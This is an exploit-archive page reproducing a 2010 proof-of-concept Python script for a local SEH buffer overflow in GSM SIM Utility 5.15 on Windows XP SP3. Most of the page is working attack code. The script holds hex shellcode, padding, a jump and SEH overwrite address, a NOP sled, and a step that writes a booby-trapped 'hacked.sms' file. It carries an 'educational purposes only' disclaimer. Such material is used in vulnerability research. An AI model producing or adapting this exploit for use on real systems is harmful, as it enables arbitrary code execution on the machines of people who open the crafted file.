Home / os / win7

GSM SIM Utility sms file Local SEH BoF

Posted on 28 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GSM SIM Utility sms file Local SEH BoF</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================== GSM SIM Utility sms file Local SEH BoF ====================================== # Exploit Title : GSM SIM Utility sms file Local SEH BoF # Date : June 28, 2010 # Author : chap0 [www.seek-truth.net] # Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol # Version : 5.15 # OS : Windows XP SP3 # Type of vuln : SEH # Greetz to : Corelan Security Team * Special Greetz to Lincoln # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054 # The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # Code: import time print &quot;|------------------------------------------------------------------|&quot; print &quot;| __ __ |&quot; print &quot;| _________ ________ / /___ _____ / /____ ____ _____ ___ |&quot; print &quot;| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |&quot; print &quot;| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |&quot; print &quot;| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |&quot; print &quot;| |&quot; print &quot;|-------------------------------------------------[ EIP Hunters ]--|&quot; print &quot;[+] GSM SIM Utility SEH Local Exploit &quot; sc =(&quot;d9eb9bd97424f431d2b27a31c964&quot; &quot;8b71308b760c8b761c8b46088b7e&quot; &quot;208b36384f1875f35901d1ffe160&quot; &quot;8b6c24248b453c8b54057801ea8b&quot; &quot;4a188b5a2001ebe337498b348b01&quot; &quot;ee31ff31c0fcac84c0740ac1cf0d&quot; &quot;01c7e9f1ffffff3b7c242875de8b&quot; &quot;5a2401eb668b0c4b8b5a1c01eb8b&quot; &quot;048b01e88944241c61c3b20829d4&quot; &quot;89e589c2688e4e0eec52e89cffff&quot; &quot;ff894504bb7ed8e273871c2452e8&quot; &quot;8bffffff894508686c6c20ff6833&quot; &quot;322e646875736572885c240a89e6&quot; &quot;56ff550489c250bba8a24dbc871c&quot; &quot;2452e85effffff68703058206820&quot; &quot;6368616864204279686f69746568&quot; &quot;4578706c31db885c241289e3686b&quot; &quot;58202068426c6163687468652068&quot; &quot;75676820685468726f31c9884c24&quot; &quot;1189e131d252535152ffd031c050&quot; &quot;ff5508&quot;) buf= &quot;A&quot; * 1834 buf+= &quot;eb069090&quot; buf+= &quot;F25E4300&quot; buf+= &quot;90&quot; * 20 buf+= sc try: crash = open(&quot;hacked.sms&quot;,'w') crash.write(buf) crash.close() print &quot;[+] Visit www.corelan.be port 8800! &quot; except: print &quot;Error occured, look at the code! &quot; time.sleep(2) print &quot;[+] Exploit file created! &quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP